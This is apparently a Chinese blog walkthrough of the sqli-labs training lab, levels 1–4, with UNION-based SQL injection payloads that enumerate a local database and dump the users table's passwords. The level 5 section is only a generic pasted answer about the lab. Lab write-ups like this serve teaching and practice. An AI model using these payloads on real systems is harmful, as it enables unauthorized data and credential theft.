sqli-labs-master通关手册

本文详细讲解了SQL注入攻击的步骤,从判断注入点到获取数据库信息,包括数据库名称、表名和字段名,最终获取敏感数据。通过实例演示了不同类型的SQL注入技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

level1
输入:[http://127.0.0.1/New/sqli-labs-master/Less-1/?id=1](http://127.0.0.1/New/sqli-labs-master/Less-1/?id=1)

后面加一个'并将后面注释掉试试效果:
构造?id=1' --+(这里#被注释了)
image.png

然后判断字段数
?id=1' order by 3 --+
order by 3的时候回显正常,order by 4的时候报错,那证明字段就是3个。

然后判断注入点
?id=0' union select 1,2,3 --+
image.png

2和3是注入点,随便找个位置开始注入
?id=0' union select 1,database(),3 --+
image.png

数据库名爆出来了,security

然后爆表名:
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+
因为这里只显示一行,虽然后面的LIMIT 0,1被注释掉了,但是后台可能还有其他函数限制输出,所以用group_concat()来将所有输出整在一行内image.png

猜测flag应该在users表中
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
image.png

maybe在password字段中
?id=-1' union select 1,group_concat(password),3 from users --+
image.png

okok搞定



level2
首先构造?id=1'--+发现报错,那这个应该不是字符类型
然后判断字段数?id=1 order by 3 --+image.png

然后构造?id=1 union select 1,2,3 --+
发现注入点,接下来的操作跟上一题一样,就不做介绍了,直接贴payload
?id=1 union select 1,database(),3 --+

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+

?id=-1 union select 1,group_concat(password),3 from users --+



level3
首先,构造一下?id=1'在这里插入图片描述
不吹牛,整个人懵掉了,这个报错似曾相识但是不会做(说白了还是我太菜)。百度了一波才发现这个用')来闭合,一下子豁然开朗~
然后构造?id=1') order by 3 --+
在这里插入图片描述
回显正常,并且字段数就是3没错。接下来的操作就跟前面的一样了,贴payload:
?id=0') union select 1,database(),3 --+

?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+

?id=0') union select 1,group_concat(password),3 from users --+
在这里插入图片描述



level4
老规矩,先构造?id-1'
嗯?没报错?换双引号试试:
?id=1"
在这里插入图片描述
模仿上一题?id=1")--+在这里插入图片描述
哦豁,那接下来就差不多啦。
?id=1") order by 3--+
?id=0") union select 1,database(),3--+
在这里插入图片描述
后面就不贴啦~



level5

很高兴能回答您的问题!要通过 sqli-labs-master,您需要了解 SQL 注入的基本原理和技巧。sqli-labs-master是一个用于学习和练习 SQL 注入的实验平台。 下面是一些通关的步骤和提示: 1. 下载和安装:首先,您需要下载 sqli-labs-master 实验平台并将其部署在本地服务器上。您可以在 GitHub 上找到该项目并按照说明进行安装。 2. 学习 SQL 注入:在开始实验之前,建议您先学习 SQL 注入的基本概念和技术。了解常见的注入漏洞类型、常用的注入语句和防御措施等。 3. 测试注入点:打开实验平台,并选择感兴趣的注入漏洞。每个漏洞都有其相应的难度级别,您可以根据自己的水平选择合适的挑战。 4. 构造注入语句:通过输入恶意的输入数据构造注入语句,尝试绕过应用程序对输入数据的验证和过滤。您可以使用常见的注入技巧,如单引号终结、UNION 查询、布尔盲注等。 5. 获取敏感信息:通过成功的注入攻击,您可以尝试获取应用程序中存储的敏感信息,如数据库中的用户名、密码等。 6. 利用漏洞:一旦成功注入并获取了敏感信息,您可以尝试进一步利用漏洞,如提权、远程命令执行等。 请注意,在进行任何实验之前,请确保您已经获得了合法的授权,并且只在受保护的环境中进行。不要尝试攻击未经授权的系统,这是非法行为且严重违法。 祝您顺利通关 sqli-labs-master!如有其他问题,请随时提问。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值